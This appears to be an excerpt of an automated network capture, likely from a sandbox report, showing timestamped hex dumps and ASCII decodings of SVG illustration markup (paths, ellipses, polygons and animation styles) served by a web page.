2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1282INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1298INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                                        Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1314INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                                        Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1330INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                                        Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1346INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                                        Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1362INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                                        Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1378INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                                        Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1394INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1410INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                                        Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1426INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                                        Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1442INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1458INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                                        Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1474INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1490INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                                        Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1506INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1522INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1538INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
